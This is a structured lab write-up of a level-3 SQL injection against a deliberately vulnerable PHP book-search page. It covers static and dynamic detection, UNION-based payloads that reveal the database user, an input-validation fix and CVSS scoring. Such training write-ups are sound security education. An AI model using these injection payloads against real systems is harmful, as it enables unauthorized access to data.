## Version 2.0
## language: en

Feature: SQL Injection Level 3
  TOE:
    Vulnerable Web Application
  Category:
    SQL Injection
  Location:
    http://192.168.1.90:9991/www/SQL/sql3.php - number (field)
  CWE:
    CWE-89: Improper Neutralization of Special Elements used in
    an SQL Command ('SQL Injection')
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Create an SQL injection to get database information
  Recommendation:
    Use prepared SQL statements and escape all user supplied input

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali linux      | 4.19.0      |
    | Firefox         | 60.8.0esr   |
  TOE information:
    Given The site
    When I enter into it
    Then The server is running LAMPP running MariaDB

  Scenario: Normal use case
    Given A search bar
    When I enter a book number
    Then I get the the books's name and its author

  Scenario: Static detection
    Given The source code from "sql3.php"
    When I see the query that's running
    """
    $query = "SELECT bookname,authorname FROM books WHERE number = '$number'";
    """
    Then I can see that the parameter is being inserted
    And There is no sanitization
    But I have to close the missing "'" to execute the query

  Scenario: Dynamic detection
    Given A search bar
    When I put a single quote inside it
    Then The page returns an error and the query
    """
    Invalid query: Whole query:
    SELECT bookname,authorname FROM books WHERE number = '''
    """
    And I can try an error based SQL Injection

  Scenario: Exploitation
    Given The vulnerability
    When I try to use a simple injection
    """
    1' UNION SELECT 1,2 #
    """
    Then I get the result with my select at the end
    """
    SILMARILLION ----> J.R.R TOLKIEN
    1 ----> 2
    """
    And I proceed to extract some database information
    """
    1' UNION SELECT 1,USER()#
    """
    And I get the username connected to the database
    """
    SILMARILLION ----> J.R.R TOLKIEN
    1 ----> root@localhost
    """
    Then I conclude I can enumerate the database

  Scenario: Remediation
    Given The source code
    When I add the next lines of code
    """
    if(!is_numeric($number)){
        echo "Please only numeric values";
        exit(0);
    }
    """
    Then I proceed to to the same injection
    When I submit the form
    Then I get the validation message
    """
    Please only numeric values
    """
    And The vulnerability is patched

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      5.6/10 (Medium) - AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N
    Temporal: Attributes that measure the exploit's popularity and fixability
      7.2/10 (High) - E:H/RL:O/RC:C
    Environmental: Unique and relevant attributes to a specific user environment
      7.6/10 (High) - CR:H/IR:H/AR:L/MAV:L/MAC:H/MPR:L/MUI:N/MS:C/MC:H/MI:H/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2019-10-2
